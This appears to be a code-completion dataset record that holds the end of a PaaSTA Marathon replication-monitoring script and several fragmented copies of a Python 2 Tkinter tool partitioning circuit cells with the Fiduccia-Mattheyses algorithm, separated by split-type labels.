status = pysensu_yelp.Status.CRITICAL
else:
log.info(output)
status = pysensu_yelp.Status.OK
send_event(
instance_config=instance_config,
status=status,
output=output,
)
def check_service_replication(
instance_config,
all_tasks,
smartstack_replication_checker,
):
"""Checks a service's replication levels based on how the service's replication
should be monitored. (smartstack or mesos)
:param instance_config: an instance of MarathonServiceConfig
:param smartstack_replication_checker: an instance of SmartstackReplicationChecker
"""
expected_count = instance_config.get_instances()
log.info("Expecting %d total tasks for %s" % (expected_count, instance_config.job_id))
proxy_port = marathon_tools.get_proxy_port_for_instance(
name=instance_config.service,
instance=instance_config.instance,
cluster=instance_config.cluster,
soa_dir=instance_config.soa_dir,
)
registrations = instance_config.get_registrations()
# if the primary registration does not match the service_instance name then
# the best we can do is check marathon for replication (for now).
if proxy_port is not None and registrations[0] == instance_config.job_id:
check_smartstack_replication_for_instance(
instance_config=instance_config,
expected_count=expected_count,
smartstack_replication_checker=smartstack_replication_checker,
)
else:
check_healthy_marathon_tasks_for_service_instance(
instance_config=instance_config,
expected_count=expected_count,
all_tasks=all_tasks,
)
def list_services(soa_dir):
rootdir = os.path.abspath(soa_dir)
return os.listdir(rootdir)
def main():
args = parse_args()
if args.verbose:
logging.basicConfig(level=logging.DEBUG)
else:
logging.basicConfig(level=logging.WARNING)
system_paasta_config = load_system_paasta_config()
cluster = system_paasta_config.get_cluster()
clients = marathon_tools.get_marathon_clients(marathon_tools.get_marathon_servers(system_paasta_config))
all_clients = clients.get_all_clients()
all_tasks = []
for client in all_clients:
all_tasks.extend(client.list_tasks())
mesos_slaves = a_sync.block(get_slaves)
smartstack_replication_checker = SmartstackReplicationChecker(mesos_slaves, system_paasta_config)
for service in list_services(soa_dir=args.soa_dir):
service_config = PaastaServiceConfigLoader(service=service, soa_dir=args.soa_dir)
for instance_config in service_config.instance_configs(
cluster=cluster,
instance_type_class=marathon_tools.MarathonServiceConfig,
):
if instance_config.get_docker_image():
check_service_replication(
instance_config=instance_config,
all_tasks=all_tasks,
smartstack_replication_checker=smartstack_replication_checker,
)
else:
log.debug(
'%s is not deployed. Skipping replication monitoring.' %
instance_config.job_id,
)
if __name__ == "__main__":
main() | random_line_split |
|
partitionA3.py | import time
import sys
import getopt
import partitionGUI
import random
import math
import bisect
import numpy as np
import Tkinter as tk
import networkx as nx
import matplotlib.pyplot as plt
from operator import itemgetter
from matplotlib.backends.backend_tkagg import FigureCanvasTkAgg, NavigationToolbar2TkAgg
from _bisect import bisect_left
from time import sleep
class Partition():
""" Circuit Cell partitioning using Fiduccia-Matheyses
Circuit: A representation of a circuit by Cells to be partitioned in two sites
Cell: Circuit component represented as a Graph node with connections to other Cells as edges
Node: Graph representation of a Cell
Site: Possible location for a Cell (Is Free or is occupied by a Cell)
Block: Graphic representation and data of a Site
"""
def __init__(self,master,seed,inputfile,quietMode):
#=============Parse file to create cells graph===============#
# Create Directed Graph and fill with input file
self.G=nx.DiGraph()
fin = open(inputfile,'r')
self.getGraph(fin)
fin.close()
#================Create Data Structures================#
# Array of Line objects to draw connections
self.connLines = []
# Array of Block objects drawing the rectangles for each site on the circuit, tracks occupancy.
# One per partition
self.sitesA = []
self.blocksA = []
self.sitesB = []
self.blocksB = []
self.sitesABkp = []
self.sitesBBkp = []
# List of Nodes sorted by gains
self.gainOrder = []
# Array of Text objects noting the name of the node assigned to a cell site
self.tags = []
# Assign Initial Seed
self.seed = seed
#================Draw Buttons and plots================#
self.master = master
self.initialize_buttons()
self.initialize_plots()
# Quite Mode to run without graphics
if quietMode:
self.running = True
# FM Partitioning Algorithm
self._startpartition(True)
sys.exit()
def getGraph(self, fin):
""" Parse Input File to fill up Graph structure """
tmpList = fin.readline().split()
# Number of Cells to be partitioned
self.cells = int(tmpList[0])
# Number of Connections or Nets
self.conns = int(tmpList[1])
# Number of Circuit Rows
self.rows = int(tmpList[2])
# Number of Circuit Columns
self.cols = int(tmpList[3])
# Number of available sites in the Circuit
self.sitesNum = self.rows*self.cols
self.winX = self.cols/4
self.winY = self.rows/4
# Add nodes from 0 to number of Cells to graph structure and initialize net array and net cost
self.G.add_nodes_from(range(0,self.cells))
for node in self.G.nodes():
self.G.node[node]["nets"]=[]
self.G.node[node]["locked"]=False
# For every Net, add edges between corresponding nodes
for net in range(0,self.conns):
tmpList = fin.readline().split()
numNodes = int(tmpList[0])
srcNode = int(tmpList[1])
#self.G.node[srcNode]["nets"].append(srcNode)
for conn in range(2,numNodes+1):
self.G.add_edge(srcNode, int(tmpList[conn]))
self.G.node[int(tmpList[conn])]["nets"].append(srcNode)
def initialize_buttons(self):
""" Draw User Buttons on top of interface
Start: Begin placement process
Pause: Pause process. Allows continuing.
Graph: Show Graph nodes to visualize connections
Plot: Show Cost plot to see SA progress
Draw: Show Circuit Cells
"""
self.start_button = tk.Button(self.master, text='Start', command = self.startRunning)
self.start_button.grid(row=0, column=0)
self.pause_button = tk.Button(self.master, text='Pause', command = self.pauseRunning)
self.pause_button.grid(row=0, column=1)
self.graph_button = tk.Button(self.master, text='Graph', command = self.showGraph)
self.graph_button.grid(row=0, column=2)
self.plot_button = tk.Button(self.master, text='Plot', command = self.showPlot)
self.plot_button.grid(row=0, column=3)
self.draw_button = tk.Button(self.master, text='Draw', command = self.drawCells)
self.draw_button.grid(row=0, column=4)
# Initialize Button States and Actions
self.pause_button['state'] = 'disabled'
# Boolean switch to control flow of placement process
self.running = False
# Boolean switch to plot placement connections and tags, turn off for faster processing
self.plot = False
self.drawing = False
self.graph = False
# Boolean switch to specify first run and allow stop/continue behavior that doesn't initialize program
self.firstRun = True
def initialize_plots(self):
""" Draw all graphic components as Canvases
Circuit Canvas: Drawing of the Circuit Sites Rows and Columns to overlay Cell Placement and Connections
Graph Canvas: Drawing of the Graph structure used for the representation of the Cells
Cost Plot Canvas: Plotting of the Cost Function used in the Annealing Process
Plot Toolbar: Toolbar options to explore the Graph and Cost Canvases (Zoom, Save, Move...)
"""
#============================Draw circuit canvas=================================#
# Draw Canvas with hardcoded width 600 and adjustable height to circuit input
ckt_max_x = 600
ckt_max_y = (ckt_max_x*(self.rows))/self.cols
scale_x = round(ckt_max_x / self.cols)
scale_y = round(ckt_max_y / self.rows)
self.canvasCirkt = tk.Canvas(self.master,width=ckt_max_x+scale_x,height=(ckt_max_y*2)+int(scale_y))
self.canvasCirkt.grid(row=1,column=1,columnspan=4)
# Draw border
self.canvasCirkt.create_rectangle(1, 1, (ckt_max_x+2)/2, (ckt_max_y*2)+int(scale_y))
self.canvasCirkt.create_rectangle(((ckt_max_x+2)/2)+scale_x, 1, ckt_max_x+scale_x, (ckt_max_y*2)+int(scale_y))
# Draw cell rows and columns in two groups
blockIndex=0
for cut in range(int(scale_y), int(ckt_max_y*2), int(scale_y)*2):
for cut2 in range(1, int(ckt_max_x), int(scale_x)):
if (cut2>ckt_max_x/2):
cut2+=scale_x
# Coordinates for top and bottom points of rectangle
points = (cut2, cut, cut2+scale_x-1, cut+scale_y)
blockObj = partitionGUI.Block(self.canvasCirkt,points,blockIndex,self.rows,self.cols)
blockIndex+=1
if (cut2>ckt_max_x/2):
self.blocksB.append(blockObj)
else:
self.blocksA.append(blockObj)
#===================================Draw Plots================================#
# Draw Figure for 2 subplots (Connections Graph and Cost Function)
self.figure, self.axes = plt.subplots(2, facecolor="white")
self.figure.set_figwidth(4)
self.axGraph = self.axes[0]
self.axCost = self.axes[1]
# Initial condition for connection Graph
self.axGraph.set_visible(False)
# Select Cost Plot as current Axis. Get lines to use for plot updates
plt.sca(self.axCost)
self.lines, = self.axCost.plot([],[])
self.axCost.set_xlabel("Time")
self.axCost.set_title("Cost")
# Draw Cost function Plot
self.canvasPlot = FigureCanvasTkAgg(self.figure, master=self.master)
self.canvasPlot.get_tk_widget().grid(row=1,column=0)
# Draw Tool Bar
self.toolbarFrame = tk.Frame(self.master)
self.toolbarFrame.grid(row=2,column=0,columnspan=3,sticky="W")
self.toolbarPlot = NavigationToolbar2TkAgg(self.canvasPlot,self.toolbarFrame)
def showGraph(self):
""" User selection to display graph """
self.graph_button['state'] = 'disabled'
# Draw connection Graph
self.axGraph.set_visible(True)
nx.draw(self.G, ax=self.axGraph, with_labels=True)
self.canvasPlot.draw()
self.canvasPlot.flush_events()
def showPlot(self):
""" User selection to display Cost """
self.plot = not self.plot
if self.plot:
self.plot_button['text'] = "No Plot"
else:
self.plot_button['text'] = "Plot"
def drawCells(self):
""" User selection to display Circuit Cells """
self.drawing = not self.drawing
if self.drawing:
self.draw_button['text'] = "No Draw"
else:
self.draw_button['text'] = "Draw"
def startRunning(self):
""" User control for placement process """
self.start_button['state'] = 'disabled'
self.pause_button['state'] = 'normal'
self.running = True
# If first run and not continuation from pause
if (self.firstRun):
self.start_timer = time.clock()
# Simulated Annelaing Function
self._startpartition(False)
# Always display result at the end of the process
self.updateDraw()
#self.updatePlot() #TODO: What to plot
# Disable Buttons when finished
self.pause_button['state'] = 'disabled'
self.plot_button['state'] = 'disabled'
self.draw_button['state'] = 'disabled'
def pauseRunning(self):
""" Pause process of SA by exiting loop """
self.start_button['state'] = 'normal'
self.pause_button['state'] = 'disabled'
self.running = False
def _startpartition(self,quietMode):
""" Start Partitioning Process """
# On first run to random placement. This allows pausing and continuing the process
if (self.firstRun == True):
self.splitPlace()
self.gain()
self.firstRun=False
self.cutCost()
startTimer = time.clock()
self.totalCutCost = self.FMPartition(quietMode)
timeDif = time.clock() - startTimer
print self.totalCutCost, " ",
print timeDif
def FMPartition(self,quietMode):
bestCutCost = self.totalCutCost
for loop in range(0,6):
difParts = -1
i=1
self.cntLocked = 0
while self.cntLocked<self.cells:
# While difference between 2 and 0. Means the move will not unbalance partitions
while not (2>=difParts>=0):
moveNode = self.gainOrder[self.cells-i][1]
moveNodePart = self.G.node[moveNode]["part"]
if self.G.node[moveNode]["locked"]:
i+=1
continue
if moveNodePart == 'A':
movePartSites = self.sitesA
tgtPartSites = self.sitesB
tgtPart = 'B'
else:
movePartSites = self.sitesB
tgtPartSites = self.sitesA
tgtPart = 'A'
# Difference on the number of cells on each site
difParts = len(movePartSites)-len(tgtPartSites) #TODO: Change for incremental size for performance
i+=1
i=1
self.G.node[moveNode]["locked"]=True
self.cntLocked+=1
movePartSites.remove(moveNode)
tgtPartSites.append(moveNode)
self.G.node[moveNode]["part"] = tgtPart
self.incrGain(moveNode)
difParts = -1
self.cutCost()
if not quietMode:
self.axCost.set_title("Best Cost=" + str(bestCutCost))
self.updatePlot(self.totalCutCost)
# Store best result
if (self.totalCutCost<=bestCutCost):
if (self.totalCutCost==bestCutCost):
if (random.random() < 0.8):
continue
self.sitesABkp = list(self.sitesA)
self.sitesBBkp = list(self.sitesB)
self.gainOrderBkp = list(self.gainOrder)
self.GBkp = self.G.copy()
bestCutCost=self.totalCutCost
self.cntLocked=0
self.sitesA = list(self.sitesABkp)
self.sitesB = list(self.sitesBBkp)
self.gainOrder = list(self.gainOrderBkp)
self.keys = [r[1] for r in self.gainOrder]
self.G = self.GBkp.copy()
for node in self.G.nodes():
self.G.node[node]["locked"]=False
return bestCutCost
def cutCost(self):
self.totalCutCost = 0
for node in self.G.nodes():
nodePart = self.G.node[node]["part"]
for nb in self.G.neighbors(node):
if self.G.node[nb]["part"]!=nodePart:
self.totalCutCost+=1
break
def cutIncrCost(self):
pass #TODO:
def updateDraw(self):
""" Draw circuit Connections and Cell Tags """
self.delConns()
self.delTags()
self.drawConns()
self.drawTags()
def updatePlot(self,cost):
""" Cost plot gets updated on every new cost value """
timer = time.clock() - self.start_timer
# Add new values to plot data set
self.lines.set_xdata(np.append(self.lines.get_xdata(), timer))
self.lines.set_ydata(np.append(self.lines.get_ydata(), cost))
# Re-scale
self.axCost.relim()
self.axCost.autoscale_view()
# Update plot
self.canvasPlot.draw()
self.canvasPlot.flush_events()
def splitPlace(self):
""" SPlit placement, for every node a Partition is assigned """
nodeSortedIter = sorted(self.G.degree_iter(),key=itemgetter(1),reverse=True)
placeCnt = 0
for node in nodeSortedIter:
if placeCnt<self.cells/2:
self.sitesA.append(node[0])
self.G.node[node[0]]["part"] = 'A'
else:
self.sitesB.append(node[0])
self.G.node[node[0]]["part"] = 'B'
placeCnt+=1
def randPlace(self):
""" Random placement, for every node a Site is assigned """
random.seed(self.seed)
# Start placement on Partition A
partA = True
for node in self.G.nodes():
randSite = random.randint(0,int(self.sitesNum/2)-1)
if partA:
partSite = self.sitesA
self.G.node[node]["part"] = 'A'
else:
partSite = self.sitesB
self.G.node[node]["part"] = 'B'
while (partSite[randSite].isOcp()):
randSite = random.randint(0,int(self.sitesNum/2)-1)
partSite[randSite].setCell(node)
self.G.node[node]["site"] = partSite[randSite]
# Toggle partition for next placement
partA = not partA
def drawConns(self):
""" Extract center point from each node and draw connection to other nodes """
for node in self.G.nodes():
pX,pY = self.G.node[node]["site"].getCenter()
for nb in self.G.neighbors(node):
nbX,nbY = self.G.node[nb]["site"].getCenter()
self.connLines.append(self.canvasCirkt.create_line(pX,pY,nbX,nbY))
self.canvasCirkt.update()
def drawTags(self):
""" Extract center point from each node and draw node Tag """
for node in self.G.nodes():
pX,pY = self.G.node[node]["site"].getCenter()
self.tags.append(self.canvasCirkt.create_text(pX, pY, text=node))
self.canvasCirkt.update()
def delConns(self):
""" Delete Connections on Circuit using array of Line objects """
for line in self.connLines:
self.canvasCirkt.delete(line)
self.canvasCirkt.update()
def delTags(self):
""" Delete Tags on Circuit using array of Text objects """
for tag in self.tags:
self.canvasCirkt.delete(tag)
self.canvasCirkt.update()
def gain(self):
""" Find the gain of every node by finding the difference between the number of nodes connected to that node on the same partition (retention force)
and the number of nodes connected that are on the other partition (moving force)"""
for node in self.G.nodes():
# Get number of nodes connected on same and other partition
movForce, retForce = self.nodeForces(node)
nodeGain = movForce-retForce
#Fill list of Nodes with gains
self.gainOrder.append((nodeGain,node))
self.gainOrder.sort(key=lambda r: r[0])
self.keys = [r[1] for r in self.gainOrder]
def incrGain(self,movedNode):
movedNets = set([movedNode])
movedNets.update(self.G.neighbors(movedNode))
movedNets.update(self.G.node[movedNode]["nets"])
for movedNet in movedNets:
movForce, retForce = self.nodeForces(movedNet)
nodeGain = movForce-retForce
del self.gainOrder[self.keys.index(movedNet)]
bisect.insort(self.gainOrder, (nodeGain,movedNet))
self.keys = [r[1] for r in self.gainOrder]
def nodeForces(self,node):
nodePart = self.G.node[node]["part"]
movForce = 0
retForce = 0
for nb in set(self.G.neighbors(node)):
if nodePart != self.G.node[nb]["part"]:
movForce+=3
else:
retForce+=1
connNodes = set(self.G.node[node]["nets"])
for connNode in connNodes:
if nodePart != self.G.node[connNode]["part"]:
movForce+=3
else:
retForce+=1
return movForce, retForce
def quitApp(self):
""" Exit """
self.master.destroy()
self.master.quit()
def main(argv):
#==============Initialize Graphics============#
root = tk.Tk()
#=================Options=================#
# Default Values
inputfile = None
quietMode = False
seed = 30
try:
opts, args = getopt.getopt(argv, "hqs:t:i:", ["ifile="])
except getopt.GetoptError:
print 'test.py -i <inputfile>'
sys.exit(2)
for opt, arg in opts:
if opt == '-h':
print 'test.py -i <inputfile> [-q] [-s <Seed>]'
print "-q : Quiet Mode"
print "-t <Temperature>: Initial temperature for SA"
sys.exit()
elif opt in ("-i", "--ifile"):
inputfile = arg
elif opt == '-s':
seed = int(arg)
elif opt == "-q":
quietMode = True
if (not inputfile):
print 'test.py -i <inputfile>'
sys.exit(2)
partition = Partition(root,seed,inputfile,quietMode)
root.wm_title("FM Partitioning Tool. EECE583: Jose Pinilla")
root.protocol('WM_DELETE_WINDOW', partition.quitApp)
root.resizable(False, False)
root.mainloop()
|
if __name__ == "__main__":
main(sys.argv[1:]) | random_line_split |
|
partitionA3.py | import time
import sys
import getopt
import partitionGUI
import random
import math
import bisect
import numpy as np
import Tkinter as tk
import networkx as nx
import matplotlib.pyplot as plt
from operator import itemgetter
from matplotlib.backends.backend_tkagg import FigureCanvasTkAgg, NavigationToolbar2TkAgg
from _bisect import bisect_left
from time import sleep
class Partition():
""" Circuit Cell partitioning using Fiduccia-Matheyses
Circuit: A representation of a circuit by Cells to be partitioned in two sites
Cell: Circuit component represented as a Graph node with connections to other Cells as edges
Node: Graph representation of a Cell
Site: Possible location for a Cell (Is Free or is occupied by a Cell)
Block: Graphic representation and data of a Site
"""
def __init__(self,master,seed,inputfile,quietMode):
#=============Parse file to create cells graph===============#
# Create Directed Graph and fill with input file
self.G=nx.DiGraph()
fin = open(inputfile,'r')
self.getGraph(fin)
fin.close()
#================Create Data Structures================#
# Array of Line objects to draw connections
self.connLines = []
# Array of Block objects drawing the rectangles for each site on the circuit, tracks occupancy.
# One per partition
self.sitesA = []
self.blocksA = []
self.sitesB = []
self.blocksB = []
self.sitesABkp = []
self.sitesBBkp = []
# List of Nodes sorted by gains
self.gainOrder = []
# Array of Text objects noting the name of the node assigned to a cell site
self.tags = []
# Assign Initial Seed
self.seed = seed
#================Draw Buttons and plots================#
self.master = master
self.initialize_buttons()
self.initialize_plots()
# Quite Mode to run without graphics
if quietMode:
self.running = True
# FM Partitioning Algorithm
self._startpartition(True)
sys.exit()
def getGraph(self, fin):
""" Parse Input File to fill up Graph structure """
tmpList = fin.readline().split()
# Number of Cells to be partitioned
self.cells = int(tmpList[0])
# Number of Connections or Nets
self.conns = int(tmpList[1])
# Number of Circuit Rows
self.rows = int(tmpList[2])
# Number of Circuit Columns
self.cols = int(tmpList[3])
# Number of available sites in the Circuit
self.sitesNum = self.rows*self.cols
self.winX = self.cols/4
self.winY = self.rows/4
# Add nodes from 0 to number of Cells to graph structure and initialize net array and net cost
self.G.add_nodes_from(range(0,self.cells))
for node in self.G.nodes():
self.G.node[node]["nets"]=[]
self.G.node[node]["locked"]=False
# For every Net, add edges between corresponding nodes
for net in range(0,self.conns):
tmpList = fin.readline().split()
numNodes = int(tmpList[0])
srcNode = int(tmpList[1])
#self.G.node[srcNode]["nets"].append(srcNode)
for conn in range(2,numNodes+1):
self.G.add_edge(srcNode, int(tmpList[conn]))
self.G.node[int(tmpList[conn])]["nets"].append(srcNode)
def initialize_buttons(self):
""" Draw User Buttons on top of interface
Start: Begin placement process
Pause: Pause process. Allows continuing.
Graph: Show Graph nodes to visualize connections
Plot: Show Cost plot to see SA progress
Draw: Show Circuit Cells
"""
self.start_button = tk.Button(self.master, text='Start', command = self.startRunning)
self.start_button.grid(row=0, column=0)
self.pause_button = tk.Button(self.master, text='Pause', command = self.pauseRunning)
self.pause_button.grid(row=0, column=1)
self.graph_button = tk.Button(self.master, text='Graph', command = self.showGraph)
self.graph_button.grid(row=0, column=2)
self.plot_button = tk.Button(self.master, text='Plot', command = self.showPlot)
self.plot_button.grid(row=0, column=3)
self.draw_button = tk.Button(self.master, text='Draw', command = self.drawCells)
self.draw_button.grid(row=0, column=4)
# Initialize Button States and Actions
self.pause_button['state'] = 'disabled'
# Boolean switch to control flow of placement process
self.running = False
# Boolean switch to plot placement connections and tags, turn off for faster processing
self.plot = False
self.drawing = False
self.graph = False
# Boolean switch to specify first run and allow stop/continue behavior that doesn't initialize program
self.firstRun = True
def initialize_plots(self):
""" Draw all graphic components as Canvases
Circuit Canvas: Drawing of the Circuit Sites Rows and Columns to overlay Cell Placement and Connections
Graph Canvas: Drawing of the Graph structure used for the representation of the Cells
Cost Plot Canvas: Plotting of the Cost Function used in the Annealing Process
Plot Toolbar: Toolbar options to explore the Graph and Cost Canvases (Zoom, Save, Move...)
"""
#============================Draw circuit canvas=================================#
# Draw Canvas with hardcoded width 600 and adjustable height to circuit input
ckt_max_x = 600
ckt_max_y = (ckt_max_x*(self.rows))/self.cols
scale_x = round(ckt_max_x / self.cols)
scale_y = round(ckt_max_y / self.rows)
self.canvasCirkt = tk.Canvas(self.master,width=ckt_max_x+scale_x,height=(ckt_max_y*2)+int(scale_y))
self.canvasCirkt.grid(row=1,column=1,columnspan=4)
# Draw border
self.canvasCirkt.create_rectangle(1, 1, (ckt_max_x+2)/2, (ckt_max_y*2)+int(scale_y))
self.canvasCirkt.create_rectangle(((ckt_max_x+2)/2)+scale_x, 1, ckt_max_x+scale_x, (ckt_max_y*2)+int(scale_y))
# Draw cell rows and columns in two groups
blockIndex=0
for cut in range(int(scale_y), int(ckt_max_y*2), int(scale_y)*2):
for cut2 in range(1, int(ckt_max_x), int(scale_x)):
if (cut2>ckt_max_x/2):
cut2+=scale_x
# Coordinates for top and bottom points of rectangle
points = (cut2, cut, cut2+scale_x-1, cut+scale_y)
blockObj = partitionGUI.Block(self.canvasCirkt,points,blockIndex,self.rows,self.cols)
blockIndex+=1
if (cut2>ckt_max_x/2):
self.blocksB.append(blockObj)
else:
self.blocksA.append(blockObj)
#===================================Draw Plots================================#
# Draw Figure for 2 subplots (Connections Graph and Cost Function)
self.figure, self.axes = plt.subplots(2, facecolor="white")
self.figure.set_figwidth(4)
self.axGraph = self.axes[0]
self.axCost = self.axes[1]
# Initial condition for connection Graph
self.axGraph.set_visible(False)
# Select Cost Plot as current Axis. Get lines to use for plot updates
plt.sca(self.axCost)
self.lines, = self.axCost.plot([],[])
self.axCost.set_xlabel("Time")
self.axCost.set_title("Cost")
# Draw Cost function Plot
self.canvasPlot = FigureCanvasTkAgg(self.figure, master=self.master)
self.canvasPlot.get_tk_widget().grid(row=1,column=0)
# Draw Tool Bar
self.toolbarFrame = tk.Frame(self.master)
self.toolbarFrame.grid(row=2,column=0,columnspan=3,sticky="W")
self.toolbarPlot = NavigationToolbar2TkAgg(self.canvasPlot,self.toolbarFrame)
def showGraph(self):
""" User selection to display graph """
self.graph_button['state'] = 'disabled'
# Draw connection Graph
self.axGraph.set_visible(True)
nx.draw(self.G, ax=self.axGraph, with_labels=True)
self.canvasPlot.draw()
self.canvasPlot.flush_events()
def showPlot(self):
""" User selection to display Cost """
self.plot = not self.plot
if self.plot:
self.plot_button['text'] = "No Plot"
else:
self.plot_button['text'] = "Plot"
def drawCells(self):
""" User selection to display Circuit Cells """
self.drawing = not self.drawing
if self.drawing:
self.draw_button['text'] = "No Draw"
else:
self.draw_button['text'] = "Draw"
def startRunning(self):
""" User control for placement process """
self.start_button['state'] = 'disabled'
self.pause_button['state'] = 'normal'
self.running = True
# If first run and not continuation from pause
if (self.firstRun):
self.start_timer = time.clock()
# Simulated Annelaing Function
self._startpartition(False)
# Always display result at the end of the process
self.updateDraw()
#self.updatePlot() #TODO: What to plot
# Disable Buttons when finished
self.pause_button['state'] = 'disabled'
self.plot_button['state'] = 'disabled'
self.draw_button['state'] = 'disabled'
def pauseRunning(self):
""" Pause process of SA by exiting loop """
self.start_button['state'] = 'normal'
self.pause_button['state'] = 'disabled'
self.running = False
def _startpartition(self,quietMode):
""" Start Partitioning Process """
# On first run to random placement. This allows pausing and continuing the process
if (self.firstRun == True):
|
startTimer = time.clock()
self.totalCutCost = self.FMPartition(quietMode)
timeDif = time.clock() - startTimer
print self.totalCutCost, " ",
print timeDif
def FMPartition(self,quietMode):
bestCutCost = self.totalCutCost
for loop in range(0,6):
difParts = -1
i=1
self.cntLocked = 0
while self.cntLocked<self.cells:
# While difference between 2 and 0. Means the move will not unbalance partitions
while not (2>=difParts>=0):
moveNode = self.gainOrder[self.cells-i][1]
moveNodePart = self.G.node[moveNode]["part"]
if self.G.node[moveNode]["locked"]:
i+=1
continue
if moveNodePart == 'A':
movePartSites = self.sitesA
tgtPartSites = self.sitesB
tgtPart = 'B'
else:
movePartSites = self.sitesB
tgtPartSites = self.sitesA
tgtPart = 'A'
# Difference on the number of cells on each site
difParts = len(movePartSites)-len(tgtPartSites) #TODO: Change for incremental size for performance
i+=1
i=1
self.G.node[moveNode]["locked"]=True
self.cntLocked+=1
movePartSites.remove(moveNode)
tgtPartSites.append(moveNode)
self.G.node[moveNode]["part"] = tgtPart
self.incrGain(moveNode)
difParts = -1
self.cutCost()
if not quietMode:
self.axCost.set_title("Best Cost=" + str(bestCutCost))
self.updatePlot(self.totalCutCost)
# Store best result
if (self.totalCutCost<=bestCutCost):
if (self.totalCutCost==bestCutCost):
if (random.random() < 0.8):
continue
self.sitesABkp = list(self.sitesA)
self.sitesBBkp = list(self.sitesB)
self.gainOrderBkp = list(self.gainOrder)
self.GBkp = self.G.copy()
bestCutCost=self.totalCutCost
self.cntLocked=0
self.sitesA = list(self.sitesABkp)
self.sitesB = list(self.sitesBBkp)
self.gainOrder = list(self.gainOrderBkp)
self.keys = [r[1] for r in self.gainOrder]
self.G = self.GBkp.copy()
for node in self.G.nodes():
self.G.node[node]["locked"]=False
return bestCutCost
def cutCost(self):
self.totalCutCost = 0
for node in self.G.nodes():
nodePart = self.G.node[node]["part"]
for nb in self.G.neighbors(node):
if self.G.node[nb]["part"]!=nodePart:
self.totalCutCost+=1
break
def cutIncrCost(self):
pass #TODO:
def updateDraw(self):
""" Draw circuit Connections and Cell Tags """
self.delConns()
self.delTags()
self.drawConns()
self.drawTags()
def updatePlot(self,cost):
""" Cost plot gets updated on every new cost value """
timer = time.clock() - self.start_timer
# Add new values to plot data set
self.lines.set_xdata(np.append(self.lines.get_xdata(), timer))
self.lines.set_ydata(np.append(self.lines.get_ydata(), cost))
# Re-scale
self.axCost.relim()
self.axCost.autoscale_view()
# Update plot
self.canvasPlot.draw()
self.canvasPlot.flush_events()
def splitPlace(self):
""" SPlit placement, for every node a Partition is assigned """
nodeSortedIter = sorted(self.G.degree_iter(),key=itemgetter(1),reverse=True)
placeCnt = 0
for node in nodeSortedIter:
if placeCnt<self.cells/2:
self.sitesA.append(node[0])
self.G.node[node[0]]["part"] = 'A'
else:
self.sitesB.append(node[0])
self.G.node[node[0]]["part"] = 'B'
placeCnt+=1
def randPlace(self):
""" Random placement, for every node a Site is assigned """
random.seed(self.seed)
# Start placement on Partition A
partA = True
for node in self.G.nodes():
randSite = random.randint(0,int(self.sitesNum/2)-1)
if partA:
partSite = self.sitesA
self.G.node[node]["part"] = 'A'
else:
partSite = self.sitesB
self.G.node[node]["part"] = 'B'
while (partSite[randSite].isOcp()):
randSite = random.randint(0,int(self.sitesNum/2)-1)
partSite[randSite].setCell(node)
self.G.node[node]["site"] = partSite[randSite]
# Toggle partition for next placement
partA = not partA
def drawConns(self):
""" Extract center point from each node and draw connection to other nodes """
for node in self.G.nodes():
pX,pY = self.G.node[node]["site"].getCenter()
for nb in self.G.neighbors(node):
nbX,nbY = self.G.node[nb]["site"].getCenter()
self.connLines.append(self.canvasCirkt.create_line(pX,pY,nbX,nbY))
self.canvasCirkt.update()
def drawTags(self):
""" Extract center point from each node and draw node Tag """
for node in self.G.nodes():
pX,pY = self.G.node[node]["site"].getCenter()
self.tags.append(self.canvasCirkt.create_text(pX, pY, text=node))
self.canvasCirkt.update()
def delConns(self):
""" Delete Connections on Circuit using array of Line objects """
for line in self.connLines:
self.canvasCirkt.delete(line)
self.canvasCirkt.update()
def delTags(self):
""" Delete Tags on Circuit using array of Text objects """
for tag in self.tags:
self.canvasCirkt.delete(tag)
self.canvasCirkt.update()
def gain(self):
""" Find the gain of every node by finding the difference between the number of nodes connected to that node on the same partition (retention force)
and the number of nodes connected that are on the other partition (moving force)"""
for node in self.G.nodes():
# Get number of nodes connected on same and other partition
movForce, retForce = self.nodeForces(node)
nodeGain = movForce-retForce
#Fill list of Nodes with gains
self.gainOrder.append((nodeGain,node))
self.gainOrder.sort(key=lambda r: r[0])
self.keys = [r[1] for r in self.gainOrder]
def incrGain(self,movedNode):
movedNets = set([movedNode])
movedNets.update(self.G.neighbors(movedNode))
movedNets.update(self.G.node[movedNode]["nets"])
for movedNet in movedNets:
movForce, retForce = self.nodeForces(movedNet)
nodeGain = movForce-retForce
del self.gainOrder[self.keys.index(movedNet)]
bisect.insort(self.gainOrder, (nodeGain,movedNet))
self.keys = [r[1] for r in self.gainOrder]
def nodeForces(self,node):
nodePart = self.G.node[node]["part"]
movForce = 0
retForce = 0
for nb in set(self.G.neighbors(node)):
if nodePart != self.G.node[nb]["part"]:
movForce+=3
else:
retForce+=1
connNodes = set(self.G.node[node]["nets"])
for connNode in connNodes:
if nodePart != self.G.node[connNode]["part"]:
movForce+=3
else:
retForce+=1
return movForce, retForce
def quitApp(self):
""" Exit """
self.master.destroy()
self.master.quit()
def main(argv):
#==============Initialize Graphics============#
root = tk.Tk()
#=================Options=================#
# Default Values
inputfile = None
quietMode = False
seed = 30
try:
opts, args = getopt.getopt(argv, "hqs:t:i:", ["ifile="])
except getopt.GetoptError:
print 'test.py -i <inputfile>'
sys.exit(2)
for opt, arg in opts:
if opt == '-h':
print 'test.py -i <inputfile> [-q] [-s <Seed>]'
print "-q : Quiet Mode"
print "-t <Temperature>: Initial temperature for SA"
sys.exit()
elif opt in ("-i", "--ifile"):
inputfile = arg
elif opt == '-s':
seed = int(arg)
elif opt == "-q":
quietMode = True
if (not inputfile):
print 'test.py -i <inputfile>'
sys.exit(2)
partition = Partition(root,seed,inputfile,quietMode)
root.wm_title("FM Partitioning Tool. EECE583: Jose Pinilla")
root.protocol('WM_DELETE_WINDOW', partition.quitApp)
root.resizable(False, False)
root.mainloop()
if __name__ == "__main__":
main(sys.argv[1:])
| self.splitPlace()
self.gain()
self.firstRun=False
self.cutCost() | conditional_block |
partitionA3.py | import time
import sys
import getopt
import partitionGUI
import random
import math
import bisect
import numpy as np
import Tkinter as tk
import networkx as nx
import matplotlib.pyplot as plt
from operator import itemgetter
from matplotlib.backends.backend_tkagg import FigureCanvasTkAgg, NavigationToolbar2TkAgg
from _bisect import bisect_left
from time import sleep
class Partition():
""" Circuit Cell partitioning using Fiduccia-Matheyses
Circuit: A representation of a circuit by Cells to be partitioned in two sites
Cell: Circuit component represented as a Graph node with connections to other Cells as edges
Node: Graph representation of a Cell
Site: Possible location for a Cell (Is Free or is occupied by a Cell)
Block: Graphic representation and data of a Site
"""
